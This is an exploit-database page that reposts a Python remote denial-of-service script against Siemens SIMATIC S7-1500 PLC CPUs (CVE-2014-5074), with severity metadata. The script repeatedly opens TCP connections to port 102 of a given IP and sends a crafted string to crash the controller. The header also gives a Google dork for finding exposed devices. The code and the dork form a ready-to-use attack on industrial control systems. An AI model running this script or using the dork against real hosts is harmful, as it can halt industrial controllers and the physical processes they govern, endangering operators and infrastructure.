Advertisement






Siemens SIMATIC S7-1500 CPU - Remote Denial of Service

CVE Category Price Severity
CVE-2014-5074 CWE-399 $5,000 High
Author Risk Exploitation Type Date
Unknown High Remote 2018-05-23
CPE
cpe:cpe:/h:siemens:s7-1500_cpu
CVSS EPSS EPSSP
CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018050185

Below is a copy:

Siemens SIMATIC S7-1500 CPU - Remote Denial of Service
# Exploit Title: Siemens SIMATIC S7-1500 CPU - Remote Denial of Service
# Google Dork: inurl:/Portal/Portal.mwsl
# Date: 2018-05-22
# Exploit Author: t4rkd3vilz, Jameel Nabbo
# Vendor Homepage: https://www.siemens.com/
# Version: SIMATIC S7-1500 CPU all versions before V1.6
# Tested on: Kali Linux
# CVE: CVE-2014-5074



#!/usr/bin/python

import socket
import sys
from time import sleep
 
if len(sys.argv) != 2:
    print "Usage: exploit.py <ip>"
    sys.exit(0)
 
 


for x in range(1,50):
    
    
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     
    #vulnerable TCP port 102
    connect=s.connect((str(sys.argv[1]), 102))
    s.send('some evil string \r\n\n')
    print "bufff " + str(x) + " sent...\n"
     
    result=s.recv(1024)
    print result
    s.close()
     
    
    sleep(7)

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum